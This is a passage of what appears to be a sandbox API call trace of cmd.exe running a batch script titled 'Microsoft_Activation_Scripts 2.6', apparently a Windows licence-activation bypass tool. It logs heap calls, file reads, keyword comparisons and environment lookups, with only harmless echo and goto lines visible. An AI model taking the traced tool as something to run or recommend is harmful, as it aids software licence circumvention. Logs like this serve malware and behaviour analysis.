script directly from the archive file.\r\n=============================================================\r\n") returned 77 [0177.546] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.546] GetFileType (hFile=0x84) returned 0x1 [0177.546] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.547] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0177.547] GetProcessHeap () returned 0x19a8f1e0000 [0177.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.547] GetProcessHeap () returned 0x19a8f1e0000 [0177.548] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.548] GetProcessHeap () returned 0x19a8f1e0000 [0177.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0177.548] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.548] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.548] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.548] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.548] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.548] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.548] GetProcessHeap () returned 0x19a8f1e0000 [0177.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.548] GetProcessHeap () returned 0x19a8f1e0000 [0177.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb740 [0177.548] GetProcessHeap () returned 0x19a8f1e0000 [0177.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa0) returned 0x19a8f1eabb0 [0177.549] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.549] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0177.549] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe920, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe920*=0x1fff, lpOverlapped=0x0) returned 1 [0177.549] SetFilePointer (in: hFile=0x84, lDistanceToMove=5143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0177.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nst likely you are running the script directly from the archive file.\r\n=============================================================\r\n") returned 7 [0177.549] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.549] GetFileType (hFile=0x84) returned 0x1 [0177.549] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.549] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0177.549] GetProcessHeap () returned 0x19a8f1e0000 [0177.549] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.549] GetProcessHeap () returned 0x19a8f1e0000 [0177.550] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.550] GetProcessHeap () returned 0x19a8f1e0000 [0177.550] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0177.550] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.550] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.550] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.550] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.550] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.550] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.550] GetProcessHeap () returned 0x19a8f1e0000 [0177.550] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff6d0 [0177.550] GetProcessHeap () returned 0x19a8f1e0000 [0177.550] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1efe20 [0177.551] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.551] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0177.551] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe8f0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe8f0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.551] SetFilePointer (in: hFile=0x84, lDistanceToMove=5223, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0177.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Extract the archive file and launch the script from the extracted folder.\r\n", cbMultiByte=80, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Extract the archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 80 [0177.551] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.551] GetFileType (hFile=0x84) returned 0x1 [0177.551] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.551] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0177.551] GetProcessHeap () returned 0x19a8f1e0000 [0177.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.554] GetProcessHeap () returned 0x19a8f1e0000 [0177.554] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.554] GetProcessHeap () returned 0x19a8f1e0000 [0177.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1feb90 [0177.555] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.555] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.555] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.555] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.555] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.555] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.555] GetProcessHeap () returned 0x19a8f1e0000 [0177.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fead0 [0177.555] GetProcessHeap () returned 0x19a8f1e0000 [0177.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f02a0 [0177.555] GetProcessHeap () returned 0x19a8f1e0000 [0177.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa6) returned 0x19a8f200c90 [0177.555] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.556] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0177.556] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe8c0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe8c0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.556] SetFilePointer (in: hFile=0x84, lDistanceToMove=5236, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0177.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="goto MASend\r\nthe archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 13 [0177.556] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.556] GetFileType (hFile=0x84) returned 0x1 [0177.556] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.556] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0177.556] GetProcessHeap () returned 0x19a8f1e0000 [0177.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.556] GetProcessHeap () returned 0x19a8f1e0000 [0177.557] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.557] GetProcessHeap () returned 0x19a8f1e0000 [0177.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fea10 [0177.557] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0177.557] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0177.557] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0177.557] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0177.557] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0177.557] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0177.557] GetProcessHeap () returned 0x19a8f1e0000 [0177.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fe350 [0177.557] GetProcessHeap () returned 0x19a8f1e0000 [0177.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1efeb0 [0177.557] GetProcessHeap () returned 0x19a8f1e0000 [0177.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eff40 [0177.557] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.557] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0177.557] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe890, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe890*=0x1fff, lpOverlapped=0x0) returned 1 [0177.558] SetFilePointer (in: hFile=0x84, lDistanceToMove=5239, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0177.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\no MASend\r\nthe archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 3 [0177.558] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.558] GetFileType (hFile=0x84) returned 0x1 [0177.558] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.558] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0177.558] GetProcessHeap () returned 0x19a8f1e0000 [0177.558] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.558] GetProcessHeap () returned 0x19a8f1e0000 [0177.558] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.559] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0177.559] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.559] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0177.559] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efec80, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efec80*=0x1fff, lpOverlapped=0x0) returned 1 [0177.559] SetFilePointer (in: hFile=0x84, lDistanceToMove=5242, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0177.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\no MASend\r\nthe archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 3 [0177.559] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.559] GetFileType (hFile=0x84) returned 0x1 [0177.559] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.559] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0177.559] GetProcessHeap () returned 0x19a8f1e0000 [0177.559] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.559] GetProcessHeap () returned 0x19a8f1e0000 [0177.560] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.560] _tell (_FileHandle=3) returned 5242 [0177.560] _close (_FileHandle=3) returned 0 [0177.560] GetProcessHeap () returned 0x19a8f1e0000 [0177.560] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f95e0 [0177.560] _pipe (in: _PtHandles=0x19a8f1f95f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f95f0) returned 0 [0177.560] _dup (_FileHandle=1) returned 5 [0177.561] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0177.561] _close (_FileHandle=4) returned 0 [0177.561] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0177.561] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0177.561] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0177.561] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0177.561] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0177.561] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0177.561] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0177.561] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0177.561] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0177.561] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0177.561] GetProcessHeap () returned 0x19a8f1e0000 [0177.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.561] GetProcessHeap () returned 0x19a8f1e0000 [0177.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20a880 [0177.562] GetProcessHeap () returned 0x19a8f1e0000 [0177.562] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1f01b0 [0177.562] GetEnvironmentVariableW (in: lpName="_batf", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x20 [0177.562] GetProcessHeap () returned 0x19a8f1e0000 [0177.562] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f01b0) returned 1 [0177.562] GetProcessHeap () returned 0x19a8f1e0000 [0177.562] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20a880) returned 1 [0177.562] GetProcessHeap () returned 0x19a8f1e0000 [0177.562] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f206860, Size=0x138) returned 0x19a8f206860 [0177.562] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f206860) returned 0x138 [0177.563] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2069b0 [0177.563] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0177.563] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0177.563] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0177.563] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0177.563] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0177.563] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0177.563] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0177.563] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0177.563] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0177.563] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0177.563] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff250 [0177.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0177.563] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1efc40 [0177.563] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1f9f80 [0177.563] GetProcessHeap () returned 0x19a8f1e0000 [0177.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb2) returned 0x19a8f1ffa90 [0177.563] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200de0 [0177.564] SetErrorMode (uMode=0x0) returned 0x0 [0177.564] SetErrorMode (uMode=0x1) returned 0x0 [0177.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x19a8f200df0, lpFilePart=0x43f9efe7d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe7d0*="system32") returned 0x13 [0177.564] SetErrorMode (uMode=0x0) returned 0x1 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x48) returned 0x19a8f200de0 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x48 [0177.564] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3e) returned 0x19a8f1f9130 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x68) returned 0x19a8f1eaf40 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaf40, Size=0x3e) returned 0x19a8f1eaf40 [0177.564] GetProcessHeap () returned 0x19a8f1e0000 [0177.564] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf40) returned 0x3e [0177.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0177.565] GetProcessHeap () returned 0x19a8f1e0000 [0177.565] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1ea8b0 [0177.565] GetProcessHeap () returned 0x19a8f1e0000 [0177.565] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x88) returned 0x19a8f1ea8b0 [0177.565] GetProcessHeap () returned 0x19a8f1e0000 [0177.565] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x88 [0177.565] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8940 [0177.565] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0177.565] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0177.565] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0177.566] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeab0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.566] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe8d0 | out: lpAttributeList=0x43f9efe9d0, lpSize=0x43f9efe8d0) returned 1 [0177.566] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe9d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe8bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe9d0, lpPreviousValue=0x0) returned 1 [0177.566] GetStartupInfoW (in: lpStartupInfo=0x43f9efe960 | out: lpStartupInfo=0x43f9efe960*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0177.567] GetProcessHeap () returned 0x19a8f1e0000 [0177.567] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f01e0 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0177.567] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0177.568] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", 